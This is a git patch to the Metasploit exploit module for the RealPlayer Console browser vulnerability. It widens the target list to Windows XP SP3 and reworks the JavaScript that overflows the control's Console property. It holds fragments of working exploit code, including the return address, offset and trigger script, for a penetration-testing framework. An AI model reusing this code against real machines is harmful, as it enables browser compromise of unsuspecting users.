From ee0f6ed5ccf8d4b608ff33c5f28b96e65558b888 Mon Sep 17 00:00:00 2001 From: Mario Ceballos Date: Sun, 27 Jul 2008 11:23:42 +0000 Subject: [PATCH] module update from Elazar Broad. git-svn-id: file:///home/svn/framework3/trunk@5606 4d416f70-5f16-0410-b530-b9f4589650da --- .../exploits/windows/browser/realplayer_console.rb | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/modules/exploits/windows/browser/realplayer_console.rb b/modules/exploits/windows/browser/realplayer_console.rb index f41ac870ce..6cee56055c 100644 --- a/modules/exploits/windows/browser/realplayer_console.rb +++ b/modules/exploits/windows/browser/realplayer_console.rb @@ -45,7 +45,7 @@ class Exploits::Windows::Browser::RealPlayer_Console < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English', { 'Offset' => 32, 'Ret' => 0x0C0C0C0C } ] + [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0 English', { 'Offset' => 32, 'Ret' => 0x0C0C0C0C } ] ], 'DisclosureDate' => 'March 8 2008', 'DefaultTarget' => 0)) @@ -84,7 +84,6 @@ class Exploits::Windows::Browser::RealPlayer_Console < Msf::Exploit::Remote j_memory = rand_text_alpha(rand(100) + 1) j_counter = rand_text_alpha(rand(30) + 2) j_ret = rand_text_alpha(rand(100) + 1) - j_m = rand_text_alpha(rand(100) + 1) # Build out the message content = %Q| @@ -104,13 +103,9 @@ class Exploits::Windows::Browser::RealPlayer_Console < Msf::Exploit::Remote #{j_ret} = unescape('#{ret}'); while (#{j_ret}.length < #{offset}) #{j_ret} += #{j_ret}; - #{j_m} = #{racontrol}.Console; #{racontrol}.Console = #{j_ret}; - #{racontrol}.Console = #{j_m}; - - #{j_m} = #{racontrol}.Console; - #{racontrol}.Console = #{j_ret}; - #{racontrol}.Console = #{j_m}; + #{racontrol}.Console = ''; + #{racontrol}.Console = #{j_ret}; |